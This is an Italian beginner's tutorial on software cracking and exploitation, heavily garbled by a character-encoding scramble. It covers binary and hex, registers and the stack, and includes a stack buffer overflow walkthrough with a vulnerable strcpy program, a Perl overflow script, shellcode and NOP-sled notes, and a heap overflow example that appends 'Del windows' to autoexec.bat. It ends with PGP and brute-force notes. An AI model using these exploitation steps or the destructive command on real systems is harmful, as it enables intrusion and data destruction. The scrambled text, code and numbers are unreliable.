!rac(er come indica il termine Tcrac-T rottura, si tratta di un TparenteT dell)Hac-er ma che ha
come obiettivo la rottura degli schemi di protezione dei soft&are. Uin dai primi usi di programmi
su P$ * facile vedere TreleaseT di programmi modificate da $rac-er.
.everser termine che deriva dalla tecnica del Treverse engenieeringT. $ome dice la parla stessa
Tingegneria inversaT, si tratta di una tecnica usata per vedere come funziona un soft&are. ,
differenza del $rac-er che ha come scopo la rottura della protezione, il 'everser ha come unico
interesse %uello di capire l)intero funzionamento del soft&are senza possederne i sorgenti.
Personalmente ritengo che oggigiorno la figura del FB'H Hac-er * praticamente scomparsa, un
tempo %uando internet era ancora una bambina e i soft&are dei server erano pieni di bug, fecero
al felicit di molti heheh. Hggi a parte %ualche rara eccezione (che ci da @icrosoft hahaha" *
davvero difficile riuscire a scoprire nuovi bug che permettono di penetrare in macchine altrui.
Fi metto in guardia, c)* un modo infallibile per riconoscere un finto hac-er, %uando incontrerete
%ualcuno che va dicendo che lui * un hac-er state sicuri al 4;;] che non lo *, buttatelo nella
ignore list perch* * solo un imbecille.
Pi attualizzabile * la figura del $rac-er (ve lo dimostrer+" anche se le protezioni dei soft&are,
rispetto un tempo, sono diventate davvero pi complesse il crac-er non fa nulla di magico,
applica solo la sua conoscenza e passione per il settore.
O5iettivi
Siete sempre stati dal lato passivo del crac-ing e desiderate esserne parte attivaA Siete nel posto
giusto (<"
!)obiettivo di tutti i documenti che troverete in %uesto sito * %uello di aiutare un neofita (un
ne&bie", ad entrare nel mondo del crac-ing con la minor fatica possibile. 1on pretendete di
diventare $rac-er famosi, altrimenti passerete la vita davanti al P$, c)* ben di meglio nella vita.
Prendete il crac-ing come una curiosit un hobb>, non ossessionatevi e riponete le vostre
capacit in cose pi professionali e remunerative (" il crac-ing non vi da da mangiare.
Detto %uesto buon proseguimento iYi
)l !rac(ing
!+"* -' )L !.*!N)N?O
Se cerchiamo nel vocabolario probabilmente troveremo una definizione di %uesto tipo

crac(er( sottile galletta croccante, spesso salata.

Hehehe sicuramente non * %uesto che interessa a noi, giustoA , noi interessa l)ambito
informatico.
$on %uesto termine si intende l)arte del b>passare o disattivare i sistemi di protezione dei
soft&are senza possederne il sorgente.
Uaccio un esempio(
avete un programma che una volta installato e avviato, ci avvisa con un messaggio che la
versione che stiamo usando * dimostrativa e durer 3; giorni, al termine del %uale dovremo
ac%uistare il programma.
uesto * un tipico esempio di programma share&are, ovvero %uelle versioni di programma che
servono per far valutare il soft&are. Possono essere completi e scadere dopo un periodo di tempo
oppure avere alcune funzioni o men disabilitati, che saranno abilitati solo nella versione
completa.
!e soft&are house per facilitare la produzione dei loro programmi e per facilitarne la vendita,
nella stramaggioranza dei casi mettono a disposizione soft&are completi che diventeranno senza
limiti una volta ac%uistato il prodotto. $omeA
Possiamo distinguere varie categorie di share&are
< registrabili
< non registrabili

/ registrabili sono %uelli che possono essere sbloccati inserendo un nome e un seriale,
%uest)ultimo spesso calcolato da un algoritmo in base al nome.
/ non registrabili sono apparsi per rendere difficile la vita dei crac-er, %uesto perch* non
presentano un boJ dove inserire i dati della registrazione ma per esempio consentono di
utilizzare il programma completo per un determinato numero di giorni o di operazioni, ecco i
cosiddetti Irial.

Poi possiamo parlare di protezioni della copia, tipo la famosa Secure'om della Son> che legge
una locazione del $D che non puo) essere scritta dai comuni masterizzatori perci+ all)avvio di una
copia il programma non partir. Peggio ancora una chiave hard&are che si attacca alla porta
parallela o usb.
1ei tutorial che andr+ a proporre vedremo tutti %uesti esempi.

GL3 S'#F!N'3 "!L <#%<Q!#8

Per poter cra--are abbiamo bisogno essenzialmente di(
< un Debugger
< un Disassembler
< un editor esadecimale
< un monitor di registro
< un monitor di file
< una guida sulle ,P/ (non gli insetti (<D"
< Pac-er/unpac-er
< altro (<"

$omun%ue capita spesso che per protezioni di media difficolt sia sufficienti solo il debugger.
)l .eversing
)NT.+>6;)+N- *LL'*.!9)T-TT6.* JAC
Da dove iniziare(
$ome detto in precedenza il $rac-er ha come scopo %uello di rompere o b>passare la protezione
del soft&are. $ome si pu+ modificare un programma senza possederne i sorgentiA
/l formato eseguibile di un programma non * altro che una se%uenza di b>te, che rappresentano
le istruzioni che il processore deve eseguire. ,lla base di tutto c)* il formato E/1,'/H, una cosa
che %ualsiasi apparecchiatura elettrica ha in comune * il formato binario.
PerchL il binarioA
!a comunicazione * un bene irrinunciabile, purtroppo capita che la parte importante della
comunicazione cio* il contenuto del messaggio, venga reso incomprensibile a causa del
linguaggio. Due soggetti che vogliono comunicare in modo comprensibile devono avere
necessariamente un linguaggio comune.
,d ugual modo noi per poter comunicare con il computer dobbiamo avere un linguaggio
condiviso da entrambi. 1ormalmente chi usa il proprio P$ o un %ualsiasi altro elettrodomestico
non pensa a come %uesto realizzi le operazioni che esegue.
1el P$ il processore comunica con tutte le sue periferiche in input e output con segnali elettrici
attraverso delle linee di controllo( il E?S.
,nalizziamo dapprima $H@B %uesti controlli vengono attivati e successivamente ?,!/ sono.
< dare risposta * abbastanza semplice( ogni linea di controllo * o non * attraversata da corrente.
Perci+ solo due possibilit.
< una volta assimilato il segnale, si deve interpretare il messaggio, in %uesto caso un messaggio
formato da 2 TparoleT( c)* corrente/non c)* corrente.

ecco perch* parliamo di linguaggio binario.

Wil processore comunica con tutte le sue periferiche esclusivamente in binario, emettendo o
meno un segnale di corrente.


/ numeri binari sono semplici espressioni, del tutto simili ai numeri decimali. !))unica differenza
sta nel fatto che utilizzano solo 2 simboli (lo zero e l)uno", invece di 4; del formato decimale al
%uale siamo abituati, di seguito a scopo di esempio riporto i primi 2; numeri binari (da ; a 4:"(
F
,
,F
,,
,FF
,F,
,,F
,,,
,FFF
,FF,
,F,F
,F,,
,,FF
,,F,
,,,F
,,,,
,FFFF
,FFF,
,FF,F
,FF,,
)L B6"

1el P$ per usare il E?S non dovrete obliterare nessun biglietto dehehehe.
/n precedenza abbiamo visto che il E?S * un insieme di linee che il processore usa per
comunicare con %ualsiasi cosa lo circonda.
uanti tipi di E?S esistonoA
Bsistono 3 tipi di E?S(
< E?S di dati
< E?S degli indirizzi
< E?S di controllo

vediamo in sintesi %uali compiti svolgono e perch* sono cosG importanti.

il E?S Dati(
Si tratta della struttura di scambio dati pi importante del computer, lo scambio avviene in modo
bidirezionale ed * gestito esclusivamente dal processore. Per %ualificare una $P? (47 Eit, 32 Eit,
75 Eit" si contano il numero di linee che il E?S utilizza. uesto indica la dimensione del bus dati.
Bcco che un processore a 32 bit ha uno scambio dati veloce il doppio rispetto i vecchi 47 bit e
oggi con i 75 bit * triplicato. /n pratica con l)aumentare delle linee del bus dati, aumenta
ovviamente anche il numero di dati passati contemporaneamente, perci+ aumenta la velocit.

/l E?S /ndirizzi(
Se il bus dati * indispensabile per lo scambio dati, * vero anche che la $P? deve sapere dove si
trovano %uesti dati, altrimenti non saprebbe distinguere un dato dall)altro. B) %ui che entra in
campo il E?S degli indirizzi (E?S ,ddress", fisicamente * di dimensioni uguali al bus dati, con lo
stesso numero di linee. /l suo scopo * %uello di individuare i dati, a differenza del bus dati *
monodirezionale ed * sempre la $P? a comandare.
$ome detto fin dall)inizio il P$ comunica esclusivamente in binario, per noi sarebbe complicato
leggere indirizzi binari, allora ci verr in aiuto la conversione in esadecimale (<"
Fi avevo detto che avremo visto %ualche istruzione assembler, ecco la prima( @HF.
Di solito la lettura e la scrittura delle locazioni di memoria avviene con il comando @HF. esempio(
@HF ,!, BS(aD/b
%uesto comando in assembler traduce li linguaggio macchina e significa( @etti in ,! il contenuto
di BS(aD/b
cosa sono ,! e BS(D/ lo vedremo poi, per il momento serve solo per capire il meccanismo.

/l E?S di $ontrollo(
uesto non * un vero e proprio bus come gli altri, abbiamo visto che il bus degli indirizzi serve a
individuare le informazioni nel bus dati ma %uesto non basta. !a $P? deve essere certa di essere
collegata all)oggetto giusto e per %uesto pone dei Eit di controllo ; e 4in una o pi linee di
controllo. /n pratica il E?S di $ontrollo serve ad organizzare le linee di controllo.
"istemi di -numerazione
Hra che sappiamo che ogni informazione del nostro P$ viene comunicata in binario, dobbiamo
trovare un modo per renderli comprensibili alla nostra mente.
?n sistema di enumerazione * un insieme di elementi che esprimono un numero e rispetta
%ueste regole(
< il numero degli elementi * detto base E
< ogni cifra del numero * uguale ad uno %ualun%ue degli elementi del sistema di numerazione
< ogni cifra occupa una posizione nel numero, il cui numero d)ordine * crescente
< ciascuna delle cifre del numero ha un peso diverso a seconda della posizione che occupa
< il peso di una cifra corrisponde alla potenza della base E elevata alla posizione n della cifra
stessa nell)ambito del numero
non ci avete capito moltoA 1on importa, non preoccupatevi (<"
possiamo dire che ogni sistema di enumerazione ha le sue regole e le rispetta correttamente, se
per esempio nel sistema di enumerazione Decimale (%uello che ci insegnano alle elementari
;,4,2,3,5,6,7,8,9,:..." prendiamo il numero 589: (preso a caso", il numero 1 * cosG composto(
1 S 5J4;
3
\8J4;
2
\9J4;
4
\:W4;
;
S 5J4;;;\8J4;;\9J4;\:J4 S 5;;;\8;;\9;\: S 589:
non ho fatto altro che applicare le regole sopra descritte sulla base del nostro sistema di
enumerazione Decimale.
Iutto %uesto per introdurvi poi al sistema di enumerazione Bsadecimale che useremo spesso.

Se vogliamo fare un analogo esempio nel sistema Einario, notiamo che le regole sono le stesse,
prendiamo il numero binario 44;4 e convertiamolo in Decimale(
1 S 4J2
3
\4J2
2
\;J2
4
\4J2
;
S 4J9\4J5\;J2\4J4S 43

44;4 base 2 si scrive (44;4"
2

43 base 4; si scrive (43"
4;


Fisto che facileA Hra sapete convertire i numeri binari in decimale hehehe
@a non * finita %ui, nell)uso dell)assembler avremo a che fare continuamente con li sistema di
enumerazione Bsadecimale cio* base 47.
@a come usare 47 caratteriA semplice oltre i numeri da ; a : aggiungeremo le lettere ,, E, $, D,
B, U.
Uacciamo subito una considerazione importante, se nel sistema decimale ogni elemento ha una
valenza che va da ; a : in esadecimale va da ; a 46 (rispetto al Decimale ovviamente".
Kiusto per avere una visione migliore dei sistemi di enumerazione scrivo di seguito una tabella
riassuntiva

"istema
-sadecimale
!orrispondente
>ecimale
!orrispondente
Binario
F F FFFF
, , FFF,
& & FF,F
1 1 FF,,
4 4 F,FF
' ' F,F,
C C F,,F
D D F,,,
A A ,FFF
@ @ ,FF,
* ,F ,F,F
B ,, ,F,,
! ,& ,,FF
> ,1 ,,F,
- ,4 ,,,F
/ ,' ,,,,

B convertire da decimale a binario ed esadecimale non ci pensiamoA @a certo (<"

Premetto che ci sono una valanga di programmi calcolatrice (pure %uella di =indo&s basta
attivare l)opzione scientifica dal men visualizza", che fanno %uesto tipo di conversione e fanno
pure le operazioni (tipo [H', ,1D ecc".
Bcco, premesso %uesto mi pare comun%ue buon allenamento mentale sapere come si fa(

da decimale a binario(
< dividere il numero decimale per 2 (il resto * definito Tbit meno significativoT"
< dividere il %uoziente per 2 (il resto * definito Tbit successivoT"
< continuare a dividere il %uoziente che si ottiene per 2, tenendo il resto dell)operazione
< l)operazione termina %uando la divisione del %uoziente non * pi possibile, il resto di %uesta
operazione * definito Tbit pi significativo del risultatoT
ecco un esempio che rende tutto pi chiaro, prendiamo il numero 257 e trasformiamolo in
binario(
operazione risultato resto
257 ( 2 S 423 ;
423 ( 2 S 74.6 4
74 ( 2 S 3;.6 4
3; ( 2 S 46 ;
46 ( 2 S 8.6 4
8 ( 2 S 3.6 4
3 ( 2 S 4.6 4
4 ( 2 S 4.6 4
leggendo dal basso verso l)alto (vedrete pi avanti che a causa dello Stac- leggeremo spesso al
contrario, comun%ue sono altre cose", il numero 257 in binario diventa 4444;44;.
Hra convertire da binario ad esadecimale * decisamente semplice, basta che tenete il riferimento
alla tabella %ui sopra, prendiamo il numero binario a gruppi di 5 elementi(
4444;44; <O 4444 ;44; <O U 7
ecco calcolato il nostro 257 in esadecimale U7 (<"
se avete la mente allenata, possiamo fare anche una conversione dal decimale direttamente
all)esadecimale
257 ( 47 S 46 resto 7
7 ( 47 S 7P47 perci+ teniamo 7

46 e 7 S U7

o- faccio un altro esempio (ma non ossessionatevi, non serve, la conversione a mano si usa solo
in caso di necessit, usiamo le calcolatrici"(
il numero 4265

4265(47S 89 resto 7
89(47S 5 resto 45 (B"
5

risulta 7 45 5S 7 B 5 <O rivoltiamo e otteniamo 5B7

bene bene, se siete arrivati fino a %ui capendo tutto %uello che avete letto, potete dire di aver
sufficientemente chiaro i seguenti concetti(
< %uale * lo scopo del crac-er (ma vaA"
< il P$ comunica in binario
< il linguaggio macchina * possibile capirlo grazie alla conversione in assembler
< il processore comunica attraverso il E?S
< ci sono diversi sistemi di enumerazione, %uelli che interessano a noi sono binario, decimale ed
esadecimale
< sappiamo eseguire conversioni nei vari sistemi... e se non siamo scemi o costretti usiamo un
soft&are per farlo ("

* ovvio che ho dato solo una infarinatura per capirne i meccanismi e cosG far+ per gli altri
argomenti, ritengo inutile approfondire concetti che non avremo bisogno di sapere fino in fondo,
altrimenti sarebbe una cosa lunghissima.
Se desiderate soddisfare maggiormente la vostra curiosit e sete di sapere, potete documentarvi
di pi per conto vostro.

H- di seguito analizzeremo %uali tipi di E?S esistono, a cosa servono, cosa * lo Stac- e cosa sono
i registri. 1el mentre scapper anche %ualche istruzione in assembler #<"
L-TT6.* >-LL- )N/+.0*;)+N)
!ome si leggono le informazioniO
!)unit fondamentale dell)informazione * il Eit. ,cronimo di Einar> ?nit, pu+ assumere solo due
valori 4 e ;.
B) pi corretto dire che il bit assume uno stato logico vero o falso. $omun%ue * normale
consuetudine parlare di valore o numero.
B) cosG, con continue se%uenze di 4 e ; che il processore comunica, %uesto linguaggio * definito
linguaggio macchina.
?n linguaggio che per la mente umana risulta ovviamente incomprensibile.
Bd * %ui che entra in campo l)assembler, il linguaggio in grado di tradurre il linguaggio macchina
in istruzioni comprensibili all)uomo.
!)assembler * un linguaggio di basso livello che permette il controllo assoluto del P$ in ogni
singolo microscopico elemento, * anche vero che si tratta di un linguaggio difficile. Bsempio
l)istruzione $,!! traduce la se%uenza 44;;44;4, ma vedremo pi avanti il significato delle pi
note istruzioni assembler.
Dopo il Eit c)* il 1ibble. Dato che ogni Eit pu+ assumere 2 valori, un 1ibble * composto da 5 Eit e
pu+ assumere 47 espressioni diverse.
2
5
S 47 valori, che vanno da ;;;; a 4444, ecco al tabella completa(
FFFF
FFF,
FF,F
FF,,
F,FF
F,F,
F,,F
F,,,
,FFF
,FF,
,F,F
,F,,
,,FF
,,F,
,,,F
,,,,


per+ in termini pratici l)unit di misura pi conosciuta ed usata * il E>te, cio* una combinazione
di 9 Eit.
Iutte le istruzioni assembler sono composte da multipli di Eit cio* da E>te.
Hgni carattere che leggiamo sullo schermo, perci+ anche ogni singola lettera o simbolo che state
leggendo in %ueste pagine, hanno dimensioni di un E>te. Sappiamo che la codifica completa di
%ueste informazioni * descritta nella Iabella dei caratteri ,scii.
Sappiamo che i caratteri hanno 267 possibilit (da ; a 266". Se apriamo il notepad, teniamo
premuto il tasto ,!I e digitiamo 76, rilasciano il tasto ,!I apparir il carattere T,T (tanto per fare
un esempio di carattere ,S$//".
Dato che un E>te * composto da 9 Eit e che un carattere * un E>te, arriviamo a concludere che
2
9 S
267 che tradotte in binario vanno da ;;;;;;;; a 4444444.
1ell)informatica (i programmatori lo sanno di sicuro", si * soliti usare misure come il =ord cio*
variabili di dimensione pari a 76637 E>te.
=ordS47 Eit. ovvero 2
47
S 76637.
,ltrettanto usato il Double=ord che come dice la parola * un doppio =ord 2
32
S 52:5:782:7.
!)uso dei 32 Eit * solito dei processori attuali... ormai arrivati a 75 e chiss fino a dove
arriveranno.
) .-?)"T.) - L+ "T*!N

/l processore bensG abbia una struttura complessa, * una struttura logica. !a $P? non * molto
diversa dall)uomo, %uando deve richiamare delle informazioni fa proprio come farebbe una
persona con un blocco degli appunti. !e memorizza scrivendole una riga sotto l)altra e poi le
riprende al momento del bisogno.
/l processore non * da meno, memorizza temporaneamente le informazioni nella sua memoria in
attesa che vengano richiamate e utilizzate.
ueste locazioni di memoria del processore si chiamano 'BK/SI'/.
/ registri sono locazioni di memoria del processore estremamente veloci, memoria da non
confondere con la ram ("
, differenza delle informazioni presenti nella ram, %uelle nei registri sono immediatamente
disponibili, mentre nella ram devono essere prelevati con una differenza di tempo nettamente
superiore.
Sui registri ci sarebbe da dire veramente molto, ma %uesto * un corso di crac-ing non di
assembler, perci+ non mi soffermer+ ai dettagli, magari integrer+ successivamente altra
documentazione.

@a lo Stac- che cosa *A !o Stac- * l)area di memoria nella %uale il processore annota gli indirizzi
che gli servono per tornare al punto di esecuzioni delle chiamate dell)istruzione $,!!.
!o Stac- letteralmente significa pila (pila di piatti" e gestisce le informazioni in esso contenuto
con il sistema !/UH, !ast /n Uirst H?I.
@i spiego meglio, tutti abbiamo presente l)immagine di una pila di piatti, sulla %uale noi
mettiamo un piatto sopra l)altro. !)ultimo piatto che mettiamo in cima, sar il primo piatto che noi
andremo a prendere. !/UH S il primo ad entrare * il primo ad uscire, cio* l)ultimo messo * il primo
ad essere prelevato, chiara la figuraA immaginate proprio una pila di piatti.
Hra vi sar anche chiaro perch* precedentemente vi avevo detto che nella conversioni da un
sistema di enumerazione a %uello binario occorreva rovesciare i dati, proprio perch* la scrittura
dello stac- avviene al contrario ("

Eene iniziamo a scendere nelle istruzioni assembler.
!e procedure nello stac- vengono chiamate da 2 istruzioni $,!! e /1I.
?na $,!! * una chiamata ad un)altra procedura, perci+ %uando %uesto avviene il processore si
annota nello stac- la locazione di memoria, una volta terminata la procedura c)* SB@P'B un
punto di ritorno che avviene attraverso l)istruzione 'BI o /'BI (vi ricorda il return vero (D "
facciamo un esempio(

<<<<
F,F& 0+5 *JPF, mette il valore F, dentro *J
F,F1 !*LL F&F* esegue la chiamata alla funzione all'indirizzo F&F*
F,F4 0+5 *9P4! mette il valore 4! in *9
<<<<
F&F* *>> BJP*J qui arriva la !*LL di F,F1P somma BJ con *J e mette il risultato in
BJ
F&FB .-T ritorna da dove Q stato chiamato cioQ la !*LL a F,F1
<<<<

credo che %uesto banalissimo esempio chiarisca a dovere la funzione svolta da $,!! e 'BI,
inoltre posiamo osservare anche l)uso di @HF e ,DD.
Fediamo anche come si gestisce lo stac- con le istruzioni P?SH e PHP
P?SH [[ si occupa di scrivere la =ord contenuta in [[ nello stac-, lo dice anche il nome stesso
P?SH cio* spingere %ualcosa.
PHP [[ si occupa di leggere la =ord dallo stac- e copiarla in [[, il nome PHP, estrarre %ualcosa.

'iassumendo(
< per ogni $,!! ci deve essere un 'BI
< per ogni /1I ci deve essere un /'BI
< per ogni P?SH ci deve essere un PHP
#&4$ Buffer +verfloB
Sono in crisi creativa,e ho deciso di scrivere %uesto piccolo tutorial per rimuovere eventuali dubbi
circa l)overflo& (in generale"
!osa serve avereO
Fuln.c // /l sorgente del programma vulnerabile
Fuln.eJe ///l programma vulnerabile compilato per =indo&s
Perl.eJe \ perl69.dll // /l compilatore perl a riga di comndo
BJp.pl // ?n file perl per effettuare l)eJploiting
Piazziamo tutti i file in una cartella a vostro piacimento,e mettiamoci al lavoro.
Per prima cosa osserviamo il sorgente del programma vulnerabile(
int main(int argc,char Wargvab"
d
char buffera6;;b#
strcp>(buffer, argva4b"#
return ;#
e
!a prima riga decide che il programma ammette un argomento all)avvio (Per esempio( TFuln.eJe
$iaoT"
!a terza e la %uarta sono decisamente piu interessanti,per cui l)argomento passato al programma
viene inserito in un buffer di che misura 6;; b>te.
Hra,domandiamoci cosa succede se per caso io inserissi un buffer maggiore di 6;; b>te,poniamo
6;6.StraripaMSemplice noAB i b>te in eccesso (2 in %uesto caso" sovrascriveranno tutto ci+ che *
presente nell)adiacente parte di memoria. Bsempio(

Hra,proviamoM
Se apriamo il file BJp.pl otiamo le seguenti righe(
print TaT J6;2#
,priamo col prompt dei comandi il file Fuln.eJe e procediamo.
Fuln.eJe h perl.eJe eJp.pl
/l carattere TpipeT redirige l)output della compilazione dello script perl (la stampa di 6;2 volte
della lettera TaT,altrimenti impossibile da fare a mano" fino all)argomento del programma,tanto
da risultare(
vuln.eJe aaaaaaaa...baaa
Bcco il risultato del vostro lavoro(
/l programma ha dato luogo ad un crash (su linuJ appare come Tsegmentation faultT nella shell"
HttimoM Hra direte, ( $he me ne fregaA
lol in effetti non avete tutti i torti,ma se ci pensate,accodando all)overflo& anzich* le 2 TbT
accodiamo un codice che il programma TcapisceT,ecco che possiamo fargli eseguire cio che
vogliamo.
/l codice che TcapisceT si chiama in gergo TshellcodeT. Hra,per rendere utile un overflo&,%uesto
deve essere applicabile.Solo che in %uesto tutorial avevamo a disposizione il sorgente del
programma vulnerabile,potendo calibrare abilmente il numero di b>te necessari./n caso di
indisponibilit di vedere il sorgente si procede per tentativi.Successivamente si accoda lo
shellcode che abbiamo preparato,che verr immediatamente eseguito.Spesso si fa uso anche di
un 1op Sled,per allineare il buffer./l nop sled * una TSlittaT di 1op (no operation",corrispondenti al
valore f;J:; che dicono al processore di saltare tutta la parte contenente 1op fino ad arrivare
allo shellcode che eseguir una shell, come la shell ?niJ )/bin/sh) oppure la shell command.com
sui sistemi operativi DHS e @icrosoft =indo&s.
, breve vi posto dei tools utili per l)eJploiting e lo shellcoding....spero di essere stato chiaro...alla
prossimaM
WBditW
$ome promesso ecco i toolz(
Bnvar //Httimo programma (Da me realizzato in $" per ottenere la variabile damibiente
,r&in //ar&in (&in32 binar>" < &in32 address resolution programb> steve hanna v.;4,
vividmachines.com, shanna.uiuc.eduthis program finds the absolute address of a function in a
specified D!!. Happ> shellcodingM
UindVmp2 // UindVmp2 (&in32 binar>version b> ,.D < class4;4 at hat<s%uadhttp(//class4;4.org,
http(//&&&.hat<s%uad.comIhis finds useful Vump points in a dll. Hnce >ou overflo& a buffer,
b>loo-ing in the various registers, it is li-el> that >ou &ill find areference to >our code. Ihis
program &ill find addresses suitible toover&rite eip that &ill return to >our code.
#&'$ 9eap +verfloB
SalveM Bccomi di nuovo.Hggi tratteremo il concetto dello Heap Hverflo&.
(Ho preso spunto dalla guida di Briccson per il tutorial ma * tutto ambientato in &indo&s,ed *
tutto diverso"
$he vi serveA
Fuln.c ///l sorgente del programma vulnerabile
Fuln.eJe ///l binario per &indo&s compilato
Perl.eJe \ perl69.dll // /l compilatore perl a riga di comndo
eJp.pl // /l file per l)eJploitation
(1aturalmente sono diversi dall)altro tutorialM"
Eene cominciamo.,nalizziamo il sorgente del programma vulnerabile(
Qinclude Pstdio.hO
Qinclude Pstdlib.hO
int main (int argc, char Wargvab"
d
U/!B Wfd#
char Wuserinput S malloc(2;"#
char Woutputfile S malloc(2;"#
if (argc P 2"
d
printf(T?so( ]s PUrase da aggiungere a importanteOfnT,argva;b"#
eJit(;"#
e
strcp>(outputfile,TolaT"#
strcp>(userinput,argva4b"#
printf (TDBE?KfnT"#
printf(TaWb ?serinput . ]p( ]sfnT,userinput,userinput"#
printf(TaWb Hutputfile . ]p( ]sfnT,outputfile,outputfile"#
printf(TaWb Distanza( ]dfnT,outputfile < userinput"#
printf(TScrittura di fT]sfT alla fine di ]s...fnT,userinput,outputfile"#
fdS fopen(outputfile,TaT"#
if (fd SS 1?!!"
d
fprintf(stderr, TBrrore nell)apertura di ]sfnT,outputfile"#
eJit(4"#
e
fprintf(fd, T]sfnT,userinput"#
fclose(fd"#
return ;#
e
uesto semplice programma realizzato in $, copia l)argomento passatogli dalla riga di comando e
lo accoda al file TolaT ([D scusate il nomeM@a -orian capir.."
Proviamo subito.
Scrivete(
Fuln.eJe $iao
Bcco cosa accade(

Httimo.Hra notiamo le informazioni di debug che ci vengono fornite con il programma(
aWb ?serinput . ;;;34$49( ciao
aWb Hutputfile . ;;;34$39( ola
aWb Distanza( 32
Scrittura di TciaoT alla fine di ola...
1otiamo che ci vengono date le posizioni dlele variabili T?serinputT (cio* la stringa da copiare" e
Hutputfile (cio* il file in cui copiare,gia preimpostato nel programa"
B,soprattutto,la distanza tra i due elementi in memoria.
Eene,ora proviamo a mandare il programma in overflo&,e successivamente a sfruttarlo per un
secondo fine...
Secondo voi il valore %uale sarA@a proviamo con 33M (dato che la distanza * 32"...
Dategli come argomento una stringa di 33 TaT
vuln.eJe aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Bd ecco il risultatoMMMM

Eello ehASiete riusciti a sovrascrivere la variabile Hutputfile,con il carattere eccedente
TaT,facendo credere al programma che il file in cui inserire la stringa non sia pi TolaT bensG TaT.
@a che mi serveAA direte voi,avete solo modificato il nome di un file...bastava farlo a mano...
Hra poniamo che ottenete una shell remota in un sistema e potete accedere solo a %uel
programma che ha permessi di lettura e scrittura che altrimenti non potreste avere.!)admin ha
dato i permessi a %uel programma perch* tanto on fa nulla di pericoloso infondo...aggiunge del
testo in un file...
Siii come no.... forse non sa chi siamoMSe dopo la sfilza di 32 TaT accodiamo,chesso...cosi...
vuln Del =indo&s \ d aurlShttp(//it.&i-ipedia.org/&i-i/1HPbnopa/urlb sled formato da 33 caratteri
< numero di caratteri della stringa da aggiungere.Bg( Del &indo&s ha 44 caratteri./l nop sled
giusto * di 33<44S22e ,utoeJe.bat
B ora che succederA1el file autoeJe.bat verr aggiunta la riga
Del &indo&s
(ovvio che anche se fosse in %uesto caso non fa nulla,ma * per comprendere la pericolosit di
%uesto tipo di attaccoM
#&C$ !rac(ing 7?7 L 0>'
Teoria sulla !rittazione
$apita , praticando %uesto Chobb>D , che ci ritroviamo sotto mano dei documenti , database o
%uant)altro che sono protetti da una chiave , ossia da una serie di algoritmi che offuscano la
visibilit di tale documento per evitarne la lettura , se non con la chiave di crittazione .
Solitamente chi usa la crittazione * un paranoico e , considerando la gente che gira al giorno
d)oggi , fa anche bene ( difficilmente per+ le nostre conversazioni e i nostri documenti sono
criptati . uando accade %uesto , ad esempio l)apertura di un file di testo dove * possibile
leggerne le informazioni , si parla di Cplain textD , in italiano testo evidente .
,l contrario , %uando abbiamo sotto mano un documento cifrato , si parla di CcrBpted textD , ossia
testo criptato o cifrato .
uali sono i procedimenti di lettura dei due documenti A Fediamoli subito .
plain text
Scrittura documento SO !ettura documento
crBpted text
Scrittura documento SO $rittazione SO 'icezione SO Decrittazione SO !ettura documento
!e differenze si notano subito . 1el primo caso , se %ualcuno sta ascoltando (o meglio sniffando"
la nostra conversazione , pu+ subito leggere %uello che ci stiamo dicendo # al contrario con un
sistema di crittazione noi possiamo rendere nascosto e illegibile il testo a chi non possiede la
chiave di crittazione .
<osHJ una chiave 8
Per parlare di chiavi dovremmo accennare giustamente anche gli algoritmi . Dun%ue , un
algoritmo * un processo matematico che consiste nell)eseguire calcoli sulle stringhe , numeri
lettere e altro , causandone la fuori uscita di un sistema illegibile .
Bsempio (
<hiave
aS7
cS2
oS:
iS4
'esto <ifrato
247:
'esto "ecifrato
ciao
Hvviamente %uesto * un algoritmo semplice , ossia con chiave debole , ma %uesto non vuol dire
che se la chiave * privata sar tanto facile decifrare il codice .
,bbiamo parlato di chiave debole , ossia una chiave dove un algoritmo * semplice , %uindi
possiamo parlare anche di chiave forte , ossia dove l)algoritmo presenta un numero molto
maggiore di calcoli , provocandone una maggiore sicurezza sul sistema criptato .
Se vogliamo provare una chiave forte c)* solo l)imbarazzo della scelta ( io personalmente scelgo ,
come la maggior parte delle persone , il sistema 7?7 . !e sessioni che utilizza il PKP sono veloci ,
sicure e molto affidabili , al contrario di alcune (come il sistema =ep della sezione =ardriving" .
7?7
/l sistema PKP , come abbiamo detto , * uno dei migliori del campo . /nnanzitutto prima il file da
cifrare viene compresso , %uesto per risparmiare memoria fisica al computer e saturazione della
linea internet .
Poi viene creata la chiave , %uindi ti verr chiesta una frase e non una pass&ord , %uesto per
evitare attacchi a forza bruta o dizionari # infine , baster dare al vostro contatto la chiave fornita
e solo lui potr leggerne il contenuto .
<ome rompere una chiave &G&
,rute =orce
Se la chiave * complessa , con tanti caratteri ma soprattutto con caratteri speciali , neanche tutti
i computer del mondo moltiplicati per 42 volte la durata dell)universo riuscirebbero a decriptarla
(ovviamente con la tecnologia di oggi" .
?n esempio banale di chiave forte * (
3n=e#nVt #u11a d1 ,ru't; ) u#".r<o"9 #uLeW )
@entre una chiave semplice pu+ essere (
pippo
Semplice da beccare , specie se viene effettuato un attacco di tipo brute force . B) possibile
utilizzare un attacco dictionar> , se la chiave contiene una sola parola del dizionario italiano (o
inglese ecc... dipende dai casi" .
<hiavi incustodite
Se criptate vuol dire che siete paranoici . Siatelo ancora di pi %uando dovete ricordarvi il codice
. Stampatevelo a mente , come se fosse la vostra seconda pass&ord infallibile , evitate foglietti ,
cartacce , bigliettini , file .tJt e tatuaggi (l)ultima penso non l)abbia fatta ancora nessuno" .
Prendete la chiave d)accesso come se fosse la vostra pass&ord . $i sono un sacco di polli che
scrivono le loro pass&ord dappertutto e ci sono anche persone che scrivono le loro chiavi . Siate
pi furbi di loro .
<ancellazione dei file
?na volta che avete scritto il testo base lo criptate ottenendo il file crittato , %uindi il testo base
lo cancellate giusto A Eeh , in teoria voi lo fate , ma il Sistema Hperativo no . Durante la
cancellazione i file non vengono eliminati del tutto , ma l)hard dis- viene marchiato sul suo disco ,
pi specificatamente nel cluster dedicato .
/l PKP ha uno strumento chiamato PKP Secure =ipe che permette di scrivere sopra i file
cancellati , facendone perdere la leggibilit . @eglio cosG , altrimenti chiun%ue sia dotato di
accesso fisico nel computer pu+ lanciare un programma di soccorso in grado di recuperare i file
cancellati solo in parte . @a solo accesso fisico A
,ackdoor
'ispondo alla precedente domanda . !a risposta * ( no . Se siete infettati da una bac-door e uno
vede tutto %uello che fate dal vostro pc , * semplicemente inutile criptare i file , tanto il testo che
scrivete viene visto in chiaro . $onsultate la sezione Eac-door per maggiori informazioni .
=alsificazioni di &G&
?no dei maggiori vantaggi di PKP * il fatto di essere opensource . Purtroppo da vantaggio pu+
